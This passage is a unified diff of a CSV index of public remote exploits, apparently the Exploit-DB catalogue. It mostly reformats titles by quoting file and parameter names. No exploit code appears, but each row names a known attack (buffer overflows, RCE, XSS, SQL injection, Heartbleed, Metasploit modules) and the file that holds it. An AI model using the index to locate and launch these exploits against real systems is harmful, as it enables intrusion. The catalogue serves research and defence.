Traversal",2003-05-29,dr_insane,windows,remote,0 @@ -12926,7 +12937,7 @@ id,file,description,date,author,platform,type,port 22726,platforms/windows/remote/22726.txt,"Microsoft Internet Explorer 5 - OBJECT Tag Buffer Overflow",2003-06-04,FelineMenace,windows,remote,0 22728,platforms/windows/remote/22728.txt,"Microsoft Internet Explorer 5 - Classic Mode FTP Client Cross Domain Scripting",2003-06-04,"Matthew Murphy",windows,remote,0 22733,platforms/hp-ux/remote/22733.c,"HP-UX FTPD 1.1.214.4 - REST Command Memory Disclosure",2003-06-05,di0aD,hp-ux,remote,0 -22734,platforms/windows/remote/22734.html,"Microsoft Internet Explorer 6 -' %USERPROFILE%' File Execution",2003-06-05,"Eiji James Yoshida",windows,remote,0 +22734,platforms/windows/remote/22734.html,"Microsoft Internet Explorer 6 - '%USERPROFILE%' File Execution",2003-06-05,"Eiji James Yoshida",windows,remote,0 22737,platforms/windows/remote/22737.txt,"Novell NetIQ Privileged User Manager 2.3.1 - 'auth.dll' pa_modify_accounts() Remote Code Execution",2012-11-15,rgod,windows,remote,0 22738,platforms/windows/remote/22738.txt,"Novell NetIQ Privileged User Manager 2.3.1 - 'ldapagnt.dll' ldapagnt_eval() Perl Code Evaluation Remote Code Execution",2012-11-15,rgod,windows,remote,0 22751,platforms/multiple/remote/22751.txt,"Mozilla 1.x / opera 6/7 - Timed document.write Method Cross Domain Policy",2003-06-07,meme-boi,multiple,remote,0 @@ -13115,7 +13126,7 @@ id,file,description,date,author,platform,type,port 23405,platforms/multiple/remote/23405.c,"Applied Watch Command Center 1.0 - Authentication Bypass (2)",2003-11-28,"Bugtraq Security",multiple,remote,0 23411,platforms/windows/remote/23411.txt,"Websense Enterprise 4/5 - Blocked Sites Cross-Site Scripting",2003-12-03,"Mr. P.Taylor",windows,remote,0 23413,platforms/linux/remote/23413.c,"PLD Software Ebola 0.1.4 - Buffer Overflow",2003-12-05,c0wboy,linux,remote,0 -23417,platforms/windows/remote/23417.c,"EZMeeting 3.x - EZNet.exe Long HTTP Request Remote Buffer Overflow",2003-12-08,kralor,windows,remote,0 +23417,platforms/windows/remote/23417.c,"EZMeeting 3.x - 'EZNet.exe' Long HTTP Request Remote Buffer Overflow",2003-12-08,kralor,windows,remote,0 23419,platforms/windows/remote/23419.txt,"Abyss Web Server 1.0/1.1 - Authentication Bypass",2003-12-08,"Luigi Auriemma",windows,remote,0 23422,platforms/windows/remote/23422.txt,"Microsoft Internet Explorer 5/6 / Mozilla 1.2.1 - URI Display Obfuscation Weakness (1)",2003-12-09,"Guy Crumpley",windows,remote,0 23423,platforms/windows/remote/23423.txt,"Microsoft Internet Explorer 5/6 / Mozilla 1.2.1 - URI Display Obfuscation Weakness (2)",2003-12-09,"Zap The Dingbat",windows,remote,0 @@ -13250,8 +13261,8 @@ id,file,description,date,author,platform,type,port 23879,platforms/windows/remote/23879.txt,"HP Web Jetadmin 7.5.2456 - setinfo.hts Script Directory Traversal",2004-03-24,wirepair,windows,remote,0 23880,platforms/windows/remote/23880.txt,"HP Web Jetadmin 7.5.2456 - Arbitrary Command Execution",2004-03-24,wirepair,windows,remote,0 23881,platforms/linux/remote/23881.txt,"Emil 2.x - Multiple Buffer Overrun / Format String Vulnerabilities",2004-03-25,"Ulf Harnhammar",linux,remote,0 -23887,platforms/windows/remote/23887.rb,"Enterasys NetSight - nssyslogd.exe Buffer Overflow (Metasploit)",2013-01-04,Metasploit,windows,remote,0 -23969,platforms/windows/remote/23969.rb,"IBM Cognos - tm1admsd.exe Overflow (Metasploit)",2013-01-08,Metasploit,windows,remote,0 +23887,platforms/windows/remote/23887.rb,"Enterasys NetSight - 'nssyslogd.exe' Buffer Overflow (Metasploit)",2013-01-04,Metasploit,windows,remote,0 +23969,platforms/windows/remote/23969.rb,"IBM Cognos - 'tm1admsd.exe' Overflow (Metasploit)",2013-01-08,Metasploit,windows,remote,0 23893,platforms/multiple/remote/23893.txt,"WebCT Campus Edition 3.8/4.x - HTML Injection",2004-03-29,"Simon Boulet",multiple,remote,0 23903,platforms/windows/remote/23903.html,"Microsoft Internet Explorer 6 - HTML Form Status Bar Misrepresentation",2004-03-31,http-equiv,windows,remote,0 23905,platforms/windows/remote/23905.txt,"ADA IMGSVR 0.4 - Remote Directory Listing",2004-04-01,"Donato Ferrante & Dr_insane",windows,remote,0 @@ -13361,7 +13372,7 @@ id,file,description,date,author,platform,type,port 24337,platforms/cgi/remote/24337.txt,"myServer 0.6.2 - math_sum.mscgi Multiple Parameter Remote Overflow",2004-07-30,dr_insane,cgi,remote,0 24338,platforms/linux/remote/24338.c,"Citadel/UX 5.9/6.x - 'Username' Buffer Overflow (1)",2004-07-30,CoKi,linux,remote,0 24339,platforms/linux/remote/24339.c,"Citadel/UX 5.9/6.x - 'Username' Buffer Overflow (2)",2004-07-30,Nebunu,linux,remote,0 -24342,platforms/cgi/remote/24342.txt,"Webcam Corp Webcam Watchdog 4.0.1 - sresult.exe Cross-Site Scripting",2004-08-02,dr_insane,cgi,remote,0 +24342,platforms/cgi/remote/24342.txt,"Webcam Corp Webcam Watchdog 4.0.1 - 'sresult.exe' Cross-Site Scripting",2004-08-02,dr_insane,cgi,remote,0 24345,platforms/windows/remote/24345.txt,"IBM Tivoli Directory Server 3.2.2/4.1 - LDACGI Directory Traversal",2004-08-02,anonymous,windows,remote,0 24350,platforms/windows/remote/24350.txt,"acme thttpd 2.0.7 - Directory Traversal",2004-08-04,CoolICE,windows,remote,0 24353,platforms/unix/remote/24353.sql,"Oracle 9i - Multiple Unspecified Vulnerabilities",2004-08-04,"Marco Ivaldi",unix,remote,0 @@ -13535,7 +13546,7 @@ id,file,description,date,author,platform,type,port 25034,platforms/windows/remote/25034.txt,"GREED 0.81 - '.GRX' File List Command Execution",2004-12-15,"Manigandan Radhakrishnan",windows,remote,0 25035,platforms/linux/remote/25035.txt,"PCAL 4.x - Calendar File getline Buffer Overflow",2004-12-15,"Danny Lungstrom",linux,remote,0 25036,platforms/linux/remote/25036.txt,"PCAL 4.x - Calendar File get_holiday Buffer Overflow",2004-12-15,"Danny Lungstrom",linux,remote,0 -25049,platforms/windows/remote/25049.txt,"Microsoft Windows XP/2000/2003 -'winhlp32' Phrase Integer Overflow",2004-12-23,"flashsky fangxing",windows,remote,0 +25049,platforms/windows/remote/25049.txt,"Microsoft Windows XP/2000/2003 - 'winhlp32' Phrase Integer Overflow",2004-12-23,"flashsky fangxing",windows,remote,0 25050,platforms/windows/remote/25050.txt,"Microsoft Windows XP/2000/2003 - 'winhlp32' Phrase Heap Overflow",2004-12-23,"flashsky fangxing",windows,remote,0 25054,platforms/linux/remote/25054.txt,"konversation irc client 0.15 - Multiple Vulnerabilities",2005-01-19,wouter@coekaerts.be,linux,remote,0 25057,platforms/windows/remote/25057.txt,"DivX Player 2.6 - '.Skin' File Directory Traversal",2005-01-21,"Luigi Auriemma",windows,remote,0 @@ -13587,7 +13598,7 @@ id,file,description,date,author,platform,type,port 25391,platforms/multiple/remote/25391.txt,"XAMPP - Phonebook.php Multiple Remote HTML Injection Vulnerabilities",2005-04-12,"Morning Wood",multiple,remote,0 25392,platforms/linux/remote/25392.c,"Salim Gasmi GLD (Greylisting Daemon) 1.x - Postfix Greylisting Daemon Buffer Overflow",2005-04-12,Xpl017Elz,linux,remote,0 25395,platforms/multiple/remote/25395.txt,"Sun JavaMail 1.3.2 - MimeBodyPart.getFileName Directory Traversal",2005-04-12,"Rafael San Miguel Carrasco",multiple,remote,0 -25396,platforms/multiple/remote/25396.txt,"Oracle 8.x/9.x/10.x - Database Multiple SQL Injection",2005-04-13,"Esteban Martinez Fayo",multiple,remote,0 +25396,platforms/multiple/remote/25396.txt,"Oracle 8.x/9.x/10.x Database - Multiple SQL Injections",2005-04-13,"Esteban Martinez Fayo",multiple,remote,0 25397,platforms/multiple/remote/25397.txt,"Oracle Database 10.1 - MDSYS.MD2.SDO_CODE_SIZE Buffer Overflow",2005-04-13,"Esteban Martinez Fayo",multiple,remote,0 25420,platforms/multiple/remote/25420.txt,"IBM Websphere 5.0/5.1/6.0 - Application Server Web Server Root JSP Source Code Disclosure",2005-04-13,"SPI Labs",multiple,remote,0 25421,platforms/windows/remote/25421.txt,"RSA Security RSA Authentication Agent For Web 5.2 - Cross-Site Scripting",2005-04-15,"Oliver Karow",windows,remote,0 @@ -13755,9 +13766,9 @@ id,file,description,date,author,platform,type,port 27181,platforms/multiple/remote/27181.txt,"IBM Lotus Domino 6.x/7.0 - iNotes JavaScript: Filter Bypass",2006-02-10,"Jakob Balle",multiple,remote,0 27182,platforms/multiple/remote/27182.txt,"IBM Lotus Domino 6.x/7.0 iNotes - Email Subject Cross-Site Scripting",2006-02-10,"Jakob Balle",multiple,remote,0 27203,platforms/hardware/remote/27203.pl,"Fortinet Fortigate 2.x/3.0 - URL Filtering Bypass",2006-02-13,"Mathieu Dessus",hardware,remote,0 -27233,platforms/linux/remote/27233.txt,"SAP Business Connector 4.6/4.7 - chopSAPLog.dsp fullName Variable Arbitrary File Disclosure",2006-02-15,"Leandro Meiners",linux,remote,0 -27234,platforms/linux/remote/27234.txt,"SAP Business Connector 4.6/4.7 - deleteSingle fullName Variable Arbitrary File Deletion",2006-02-15,"Leandro Meiners",linux,remote,0 -27235,platforms/linux/remote/27235.txt,"SAP Business Connector 4.6/4.7 - adapter-index.dsp url Variable Arbitrary Site Redirect",2006-02-15,"Leandro Meiners",linux,remote,0 +27233,platforms/linux/remote/27233.txt,"SAP Business Connector 4.6/4.7 - 'chopSAPLog.dsp' 'fullName' Parameter Arbitrary File Disclosure",2006-02-15,"Leandro Meiners",linux,remote,0 +27234,platforms/linux/remote/27234.txt,"SAP Business Connector 4.6/4.7 - 'deleteSingle' 'fullName' Parameter Arbitrary File Deletion",2006-02-15,"Leandro Meiners",linux,remote,0 +27235,platforms/linux/remote/27235.txt,"SAP Business Connector 4.6/4.7 - 'adapter-index.dsp' 'url' Parameter Arbitrary Site Redirect",2006-02-15,"Leandro Meiners",linux,remote,0 27244,platforms/linux/remote/27244.txt,"Wimpy MP3 Player 5 - Text File Overwrite",2006-02-16,ReZEN,linux,remote,0 27271,platforms/windows/remote/27271.rb,"HP Data Protector - CMD Install Service (Metasploit)",2013-08-02,"Ben Turner",windows,remote,0 27277,platforms/windows/remote/27277.py,"PCMan FTP Server 2.07 - 'PASS' Command Buffer Overflow",2013-08-02,Ottomatik,windows,remote,0 @@ -13863,7 +13874,7 @@ id,file,description,date,author,platform,type,port 28209,platforms/multiple/remote/28209.txt,"FLV Players 8 - player.php url Parameter Cross-Site Scripting",2006-07-12,xzerox,multiple,remote,0 28210,platforms/multiple/remote/28210.txt,"FLV Players 8 - popup.php url Parameter Cross-Site Scripting",2006-07-12,xzerox,multiple,remote,0 28224,platforms/windows/remote/28224.c,"Microsoft PowerPoint 2003 - 'mso.dll' .PPT Processing Unspecified Code Execution",2006-07-14,"naveed afzal",windows,remote,0 -28225,platforms/windows/remote/28225.c,"Microsoft PowerPoint 2003 - powerpnt.exe Unspecified Issue",2006-07-14,"naveed afzal",windows,remote,0 +28225,platforms/windows/remote/28225.c,"Microsoft PowerPoint 2003 - 'powerpnt.exe' Unspecified Issue",2006-07-14,"naveed afzal",windows,remote,0 28226,platforms/windows/remote/28226.c,"Microsoft PowerPoint 2003 - '.ppt' File Closure Memory Corruption",2006-07-14,"naveed afzal",windows,remote,0 28235,platforms/windows/remote/28235.c,"RARLAB WinRAR 3.x - LHA Filename Handling Buffer Overflow",2006-07-18,"Ryan Smith",windows,remote,0 28245,platforms/hardware/remote/28245.pl,"Cisco Security Monitoring Analysis and Response System JBoss - Command Execution",2006-07-19,"Jon Hart",hardware,remote,0 @@ -13926,8 +13937,8 @@ id,file,description,date,author,platform,type,port 28837,platforms/novell/remote/28837.rb,"Novell eDirectory 8.x - iMonitor HTTPSTK Buffer Overflow (3)",2006-10-30,MC,novell,remote,0 28847,platforms/hardware/remote/28847.txt,"D-Link DSL-G624T - Information Disclosure",2006-10-23,jose.palanco,hardware,remote,0 28848,platforms/hardware/remote/28848.txt,"INCA IM-204 - Information Disclosure",2006-10-23,Crackers_Child,hardware,remote,0 -28849,platforms/windows/remote/28849.txt,"Cruiseworks 1.09 - Cws.exe Doc Directory Traversal",2006-10-24,"Tan Chew Keong",windows,remote,0 -28850,platforms/windows/remote/28850.txt,"Cruiseworks 1.09 - Cws.exe Doc Buffer Overflow",2006-10-24,"Tan Chew Keong",windows,remote,0 +28849,platforms/windows/remote/28849.txt,"Cruiseworks 1.09 - 'Cws.exe' Doc Directory Traversal",2006-10-24,"Tan Chew Keong",windows,remote,0 +28850,platforms/windows/remote/28850.txt,"Cruiseworks 1.09 - 'Cws.exe' Doc Buffer Overflow",2006-10-24,"Tan Chew Keong",windows,remote,0 28853,platforms/windows/remote/28853.html,"Indusoft Thin Client 7.1 - ActiveX Buffer Overflow",2013-10-10,blake,windows,remote,0 28876,platforms/windows/remote/28876.htm,"Microsoft Internet Explorer 6 - Unspecified Code Execution (1)",2006-10-30,"Michal Bucko",windows,remote,0 28877,platforms/windows/remote/28877.htm,"Microsoft Internet Explorer 6 - Unspecified Code Execution (2)",2006-10-30,"Michal Bucko",windows,remote,0 @@ -14025,7 +14036,7 @@ id,file,description,date,author,platform,type,port 29770,platforms/linux/remote/29770.txt,"KDE Konqueror 3.x/IOSlave - FTP PASV Port-Scanning",2007-03-21,mark,linux,remote,0 29771,platforms/windows/remote/29771.txt,"Microsoft Windows Vista - Windows Mail Local File Execution",2007-03-23,kingcope,windows,remote,0 29784,platforms/php/remote/29784.php,"PHP 5.2.1 - Folded Mail Headers Email Header Injection",2007-11-26,"Stefan Esser",php,remote,0 -29785,platforms/php/remote/29785.txt,"aBitWhizzy - whizzypic.php d Variable Traversal Arbitrary Directory Listing",2007-03-14,Lostmon,php,remote,0 +29785,platforms/php/remote/29785.txt,"aBitWhizzy - 'whizzypic.php' 'd' ParameterTraversal Arbitrary Directory Listing",2007-03-14,Lostmon,php,remote,0 29788,platforms/php/remote/29788.php,"PHP 4.4.4 - Zip_Entry_Read() Integer Overflow",2007-03-27,"Stefan Esser",php,remote,0 30117,platforms/php/remote/30117.php,"PHP 5.1.6 - Chunk_Split() Function Integer Overflow",2007-05-31,"Gerhard Wagner",php,remote,0 30130,platforms/php/remote/30130.txt,"PHP 5.2.3 - EXT/Session HTTP Response Header Injection",2007-06-04,"Stefan Esser",php,remote,0 @@ -14043,7 +14054,7 @@ id,file,description,date,author,platform,type,port 29952,platforms/windows/remote/29952.html,"Sienzo Digital Music Mentor - 'DSKernel2.dll' ActiveX Control Stack Buffer Overflow",2007-05-07,shinnai,windows,remote,0 29840,platforms/windows/remote/29840.html,"Roxio CinePlayer 3.2 - 'SonicDVDDashVRNav.dll' ActiveX Control Remote Buffer Overflow",2007-04-11,"Carsten Eiram",windows,remote,0 29843,platforms/windows/remote/29843.txt,"webMethods Glue 6.5.1 Console - Directory Traversal",2007-04-11,"Patrick Webster",windows,remote,0 -29853,platforms/windows/remote/29853.rb,"LANDesk Management Suite 8.7 Alert Service - AOLSRVR.exe Buffer Overflow",2007-04-13,"Aaron Portnoy",windows,remote,0 +29853,platforms/windows/remote/29853.rb,"LANDesk Management Suite 8.7 Alert Service - 'AOLSRVR.exe' Buffer Overflow",2007-04-13,"Aaron Portnoy",windows,remote,0 29857,platforms/windows/remote/29857.rb,"Microsoft Internet Explorer - CardSpaceClaimCollection ActiveX Integer Underflow (MS13-090) (Metasploit)",2013-11-27,Metasploit,windows,remote,0 29858,platforms/windows/remote/29858.rb,"Microsoft Internet Explorer - COALineDashStyleArray Unsafe Memory Access (MS12-022) (Metasploit)",2013-11-27,Metasploit,windows,remote,0 29859,platforms/java/remote/29859.rb,"Apache Roller - OGNL Injection (Metasploit)",2013-11-27,Metasploit,java,remote,8080 @@ -14055,10 +14066,10 @@ id,file,description,date,author,platform,type,port 29932,platforms/linux/remote/29932.txt,"RedHat Directory Server 7.1 - Multiple Cross-Site Scripting Vulnerabilities",2007-04-30,"Kaushal Desai",linux,remote,0 29945,platforms/hardware/remote/29945.txt,"D-Link DSL-G624T - Var:RelaodHref Cross-Site Scripting",2007-05-03,"Tim Brown",hardware,remote,0 29951,platforms/windows/remote/29951.txt,"Microsoft SharePoint Server 3.0 - Cross-Site Scripting",2007-05-04,Solarius,windows,remote,0 -29964,platforms/windows/remote/29964.rb,"Trend Micro ServerProtect 5.58 - SpntSvc.exe Remote Stack Based Buffer Overflow",2007-05-07,MC,windows,remote,0 +29964,platforms/windows/remote/29964.rb,"Trend Micro ServerProtect 5.58 - 'SpntSvc.exe' Remote Stack Based Buffer Overflow",2007-05-07,MC,windows,remote,0 30373,platforms/windows/remote/30373.py,"Ability Mail Server 2013 (3.1.1) - Persistent Cross-Site Scripting (Web UI)",2013-12-17,"David Um",windows,remote,0 30008,platforms/java/remote/30008.rb,"Cisco Prime Data Center Network Manager - Arbitrary File Upload (Metasploit)",2013-12-03,Metasploit,java,remote,0 -30009,platforms/windows/remote/30009.rb,"ABB MicroSCADA - wserver.exe Remote Code Execution (Metasploit)",2013-12-03,Metasploit,windows,remote,12221 +30009,platforms/windows/remote/30009.rb,"ABB MicroSCADA - 'wserver.exe' Remote Code Execution (Metasploit)",2013-12-03,Metasploit,windows,remote,12221 30010,platforms/php/remote/30010.rb,"Kimai 0.9.2 - 'db_restore.php' SQL Injection (Metasploit)",2013-12-03,Metasploit,php,remote,80 30011,platforms/windows/remote/30011.rb,"Microsoft - Tagged Image File Format (TIFF) Integer Overflow (Metasploit)",2013-12-03,Metasploit,windows,remote,0 30067,platforms/windows/remote/30067.txt,"rdiffweb 0.3.5 - Directory Traversal",2007-05-22,"Jesus Roncero",windows,remote,0 @@ -14082,7 +14093,7 @@ id,file,description,date,author,platform,type,port 30257,platforms/windows/remote/30257.html,"HP Instant Support - ActiveX Control Driver Check Buffer Overflow",2007-04-01,"John Heasman",windows,remote,0 30264,platforms/multiple/remote/30264.txt,"Fujitsu ServerView 4.50.8 - DBASCIIAccess Remote Command Execution",2007-07-03,"RedTeam Pentesting GmbH",multiple,remote,0 30265,platforms/multiple/remote/30265.txt,"SAP Message Server - Group Parameter Remote Buffer Overflow",2007-07-05,"Mark Litchfield",multiple,remote,0 -30278,platforms/windows/remote/30278.c,"SAP DB 7.x Web Server - WAHTTP.exe Multiple Buffer Overflow Vulnerabilities",2007-07-05,"Mark Litchfield",windows,remote,0 +30278,platforms/windows/remote/30278.c,"SAP DB 7.x Web Server - 'WAHTTP.exe' Multiple Buffer Overflow Vulnerabilities",2007-07-05,"Mark Litchfield",windows,remote,0 30279,platforms/multiple/remote/30279.txt,"SAP Internet Graphics Server 7.0 - Parameters Cross-Site Scripting",2007-07-05,"Mark Litchfield",multiple,remote,0 30281,platforms/windows/remote/30281.txt,"Microsoft .Net Framework 2.0 - Multiple Null Byte Injection Vulnerabilities",2007-07-06,"Paul Craig",windows,remote,0 30285,platforms/linux/remote/30285.txt,"Microsoft Internet Explorer and Mozilla Firefox - URI Handler Command Injection",2007-07-10,"Thor Larholm",linux,remote,0 @@ -14248,7 +14259,7 @@ id,file,description,date,author,platform,type,port 31359,platforms/windows/remote/31359.html,"Microsoft Internet Explorer 7 - Combined JavaScript and XML Remote Information Disclosure",2008-03-07,"Ronald van den Heetkamp",windows,remote,0 31362,platforms/multiple/remote/31362.txt,"Neptune Web Server 3.0 - 404 Error Page Cross-Site Scripting",2008-03-07,NetJackal,multiple,remote,0 31364,platforms/hardware/remote/31364.txt,"F5 BIG-IP 9.4.3 - Web Management Interface Console HTML Injection",2008-03-08,nnposter,hardware,remote,0 -31395,platforms/windows/remote/31395.txt,"Cisco User-Changeable Password (UCP) 3.3.4.12.5 - CSUserCGI.exe Help Facility Cross-Site Scripting",2008-03-12,felix,windows,remote,0 +31395,platforms/windows/remote/31395.txt,"Cisco User-Changeable Password (UCP) 3.3.4.12.5 - 'CSUserCGI.exe' Help Facility Cross-Site Scripting",2008-03-12,felix,windows,remote,0 31396,platforms/linux/remote/31396.txt,"Lighttpd 1.4.x - mod_userdir Information Disclosure",2008-03-12,julien.cayzac,linux,remote,0 31698,platforms/hardware/remote/31698.txt,"F5 Networks FirePass 4100 SSL VPN - 'installControl.php3' Cross-Site Scripting",2008-04-23,"Alberto Cuesta Partida",hardware,remote,0 31699,platforms/windows/remote/31699.txt,"RSA Authentication Agent for Web 5.3 - URI Redirection",2008-04-23,"Richard Brain",windows,remote,0 @@ -14280,7 +14291,7 @@ id,file,description,date,author,platform,type,port 31630,platforms/linux/remote/31630.txt,"Adobe Flash Player 8/9.0.x - SWF File 'DeclareFunction2' ActionScript Tag Remote Code Execution",2008-04-08,"Javier Vicente Vallejo",linux,remote,0 31632,platforms/windows/remote/31632.txt,"Microsoft SharePoint Server 2.0 - Picture Source HTML Injection",2008-04-09,OneIdBeagl3,windows,remote,0 31634,platforms/unix/remote/31634.py,"Python zlib Module - Remote Buffer Overflow",2008-04-09,"Justin Ferguson",unix,remote,0 -31638,platforms/windows/remote/31638.txt,"HP OpenView Network Node Manager (OV NNM) 7.x -OpenView5.exe Action Parameter Traversal Arbitrary File Access",2008-04-11,"Luigi Auriemma",windows,remote,0 +31638,platforms/windows/remote/31638.txt,"HP OpenView Network Node Manager (OV NNM) 7.x - 'OpenView5.exe' Action Parameter Traversal Arbitrary File Access",2008-04-11,"Luigi Auriemma",windows,remote,0 31639,platforms/php/remote/31639.txt,"Trillian 3.1.9 - DTD File XML Parser Buffer Overflow",2008-04-11,david130490,php,remote,0 31917,platforms/windows/remote/31917.rb,"Symantec Endpoint Protection Manager - Remote Command Execution (Metasploit)",2014-02-26,Metasploit,windows,remote,9090 31689,platforms/windows/remote/31689.py,"HP Data Protector - EXEC_BAR Remote Command Execution",2014-02-16,"Chris Graham",windows,remote,5555 @@ -14308,8 +14319,8 @@ id,file,description,date,author,platform,type,port 31864,platforms/hardware/remote/31864.txt,"Xerox DocuShare 6 - docushare/dsweb/ServicesLib/Group URI Cross-Site Scripting",2008-05-29,Doz,hardware,remote,0 31873,platforms/windows/remote/31873.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' 'ExtractCab' ActiveX Control Buffer Overflow",2008-06-03,"Dennis Rand",windows,remote,0 31875,platforms/linux/remote/31875.py,"Python socket.recvfrom_into() - Remote Buffer Overflow",2014-02-24,Sha0,linux,remote,0 -31885,platforms/hardware/remote/31885.txt,"F5 FirePass 6.0.2.3 - /vdesk/admincon/webyfiers.php css_exceptions Parameter Cross-Site Scripting",2008-06-05,nnposter,hardware,remote,0 -31886,platforms/hardware/remote/31886.txt,"F5 FirePass 6.0.2.3 - /vdesk/admincon/index.php sql_matchscope Parameter Cross-Site Scripting",2008-06-05,nnposter,hardware,remote,0 +31885,platforms/hardware/remote/31885.txt,"F5 FirePass 6.0.2.3 - '/vdesk/admincon/webyfiers.php' 'css_exceptions' Parameter Cross-Site Scripting",2008-06-05,nnposter,hardware,remote,0 +31886,platforms/hardware/remote/31886.txt,"F5 FirePass 6.0.2.3 - '/vdesk/admincon/index.php' 'sql_matchscope' Parameter Cross-Site Scripting",2008-06-05,nnposter,hardware,remote,0 31887,platforms/linux/remote/31887.txt,"ALFTP FTP Client 4.1/5.0 - 'LIST' Command Directory Traversal",2008-06-06,"Tan Chew Keong",linux,remote,0 31890,platforms/multiple/remote/31890.txt,"Diigo Toolbar and Diigolet Comment Feature - HTML Injection / Information Disclosure",2008-06-20,"Ferruh Mavituna",multiple,remote,0 31901,platforms/multiple/remote/31901.txt,"Sun GlassFish 2.1 - 'name' Parameter Cross-Site Scripting",2008-06-10,"Eduardo Neves",multiple,remote,0 @@ -14332,7 +14343,7 @@ id,file,description,date,author,platform,type,port 32048,platforms/osx/remote/32048.html,"Apple iPhone / Apple iPod Touch < 2.0 - Multiple Remote Vulnerabilities",2008-07-11,"Hiromitsu Takagi",osx,remote,0 32133,platforms/linux/remote/32133.txt,"libxslt 1.1.x - RC4 Encryption and Decryption functions Buffer Overflow",2008-07-31,"Chris Evans",linux,remote,0 31980,platforms/windows/remote/31980.html,"UUSee 2008 - UUUpgrade ActiveX Control 'Update' Method Arbitrary File Download",2008-06-26,Symantec,windows,remote,0 -31987,platforms/windows/remote/31987.rb,"GE Proficy CIMPLICITY - gefebt.exe Remote Code Execution (Metasploit)",2014-02-28,Metasploit,windows,remote,80 +31987,platforms/windows/remote/31987.rb,"GE Proficy CIMPLICITY - 'gefebt.exe' Remote Code Execution (Metasploit)",2014-02-28,Metasploit,windows,remote,80 31996,platforms/windows/remote/31996.txt,"Microsoft Internet Explorer 7/8 Beta 1 - Frame Location Cross Domain Security Bypass",2008-06-27,"Eduardo Vela",windows,remote,0 31997,platforms/windows/remote/31997.txt,"AceFTP 3.80.3 - 'LIST' Command Directory Traversal",2008-06-27,"Tan Chew Keong",windows,remote,0 32012,platforms/linux/remote/32012.txt,"Netrw 125 Vim Script - Multiple Command Execution Vulnerabilities",2008-07-07,"Jan Minar",linux,remote,0 @@ -14345,15 +14356,15 @@ id,file,description,date,author,platform,type,port 32129,platforms/windows/remote/32129.cpp,"BlazeVideo HDTV Player 3.5 - '.PLF' File Stack Buffer Overflow",2008-07-30,"fl0 fl0w",windows,remote,0 32137,platforms/multiple/remote/32137.txt,"Apache Tomcat 6.0.16 - 'RequestDispatcher' Information Disclosure",2008-08-01,"Stefano Di Paola",multiple,remote,0 32138,platforms/multiple/remote/32138.txt,"Apache Tomcat 6.0.16 - 'HttpServletResponse.sendError()' Cross-Site Scripting",2008-08-01,"Konstantin Kolinko",multiple,remote,0 -32163,platforms/windows/remote/32163.rb,"SolidWorks Workgroup PDM 2014 - pdmwService.exe Arbitrary File Write (Metasploit)",2014-03-10,Metasploit,windows,remote,30000 +32163,platforms/windows/remote/32163.rb,"SolidWorks Workgroup PDM 2014 - 'pdmwService.exe' Arbitrary File Write (Metasploit)",2014-03-10,Metasploit,windows,remote,30000 32164,platforms/windows/remote/32164.rb,"HP Data Protector - Backup Client Service Remote Code Execution (Metasploit)",2014-03-10,Metasploit,windows,remote,5555 32165,platforms/linux/remote/32165.txt,"XAMPP Linux 1.6 - ming.php text Parameter Cross-Site Scripting",2008-08-04,"Khashayar Fereidani",linux,remote,0 32166,platforms/linux/remote/32166.txt,"XAMPP Linux 1.6 - iart.php text Parameter Cross-Site Scripting",2008-08-04,"Khashayar Fereidani",linux,remote,0 32167,platforms/multiple/remote/32167.txt,"8E6 Technologies R3000 - Host Header Internet Filter Security Bypass",2008-08-05,nnposter,multiple,remote,0 32189,platforms/multiple/remote/32189.py,"DD-WRT - Site Survey SSID Script Injection",2008-08-06,"Rafael Dominguez Vega",multiple,remote,0 32197,platforms/windows/remote/32197.pl,"Maxthon Browser 1.x - Content-Type Buffer Overflow",2008-08-09,DATA_SNIPER,windows,remote,0 -32209,platforms/windows/remote/32209.rb,"Yokogawa CENTUM CS 3000 - BKHOdeq.exe Buffer Overflow (Metasploit)",2014-03-12,Metasploit,windows,remote,20171 -32210,platforms/windows/remote/32210.rb,"Yokogawa CENTUM CS 3000 - BKBCopyD.exe Buffer Overflow (Metasploit)",2014-03-12,Metasploit,windows,remote,20111 +32209,platforms/windows/remote/32209.rb,"Yokogawa CENTUM CS 3000 - 'BKHOdeq.exe' Buffer Overflow (Metasploit)",2014-03-12,Metasploit,windows,remote,20171 +32210,platforms/windows/remote/32210.rb,"Yokogawa CENTUM CS 3000 - 'BKBCopyD.exe' Buffer Overflow (Metasploit)",2014-03-12,Metasploit,windows,remote,20111 32223,platforms/multiple/remote/32223.rb,"Ruby 1.9 dl - Module DL.dlopen Arbitrary Library Access",2008-08-11,"Keita Yamaguchi",multiple,remote,0 32224,platforms/multiple/remote/32224.rb,"Ruby 1.9 - Safe Level Multiple Function Restriction Bypass",2008-08-11,"Keita Yamaguchi",multiple,remote,0 32225,platforms/linux/remote/32225.txt,"Vim 'mch_expand_wildcards()' - Heap Based Buffer Overflow",2005-01-29,"Brian Hirt",linux,remote,0 @@ -14456,7 +14467,7 @@ id,file,description,date,author,platform,type,port 32998,platforms/multiple/remote/32998.c,"OpenSSL TLS Heartbeat Extension - 'Heartbleed' Information Leak Exploit (2) (DTLS Support)",2014-04-24,"Ayman Sagy",multiple,remote,0 32997,platforms/windows/remote/32997.pl,"Acunetix 8 build 20120704 - Remote Stack Based Overflow",2014-04-24,An7i,windows,remote,0 32919,platforms/hardware/remote/32919.txt,"SAP Router - Timing Attack Password Disclosure",2014-04-17,"Core Security",hardware,remote,0 -32920,platforms/multiple/remote/32920.txt,"Apache Geronimo 2.1.x - /console/portal/Server/Monitoring Multiple Parameter Cross-Site Scripting",2009-04-16,DSecRG,multiple,remote,0 +32920,platforms/multiple/remote/32920.txt,"Apache Geronimo 2.1.x - '/console/portal/Server/Monitoring' Multiple Parameter Cross-Site Scripting",2009-04-16,DSecRG,multiple,remote,0 32921,platforms/multiple/remote/32921.txt,"Apache Geronimo 2.1.x - '/console/portal/' URI Cross-Site Scripting",2009-04-16,DSecRG,multiple,remote,0 32922,platforms/multiple/remote/32922.html,"Apache Geronimo 2.1.x - Cross-Site Request Forgery (Multiple Admin Function)",2009-04-16,DSecRG,multiple,remote,0 32923,platforms/windows/remote/32923.cs,"MiniWeb 0.8.19 - Remote Buffer Overflow",2009-04-16,e.wiZz!,windows,remote,0 @@ -14521,7 +14532,7 @@ id,file,description,date,author,platform,type,port 33089,platforms/windows/remote/33089.pl,"iDefense COMRaider - ActiveX Control Multiple Insecure Method Vulnerabilities",2009-06-17,"Khashayar Fereidani",windows,remote,0 33351,platforms/novell/remote/33351.pl,"Novell eDirectory 8.8 - '/dhost/modules?I:' Buffer Overflow",2009-11-12,HACKATTACK,novell,remote,0 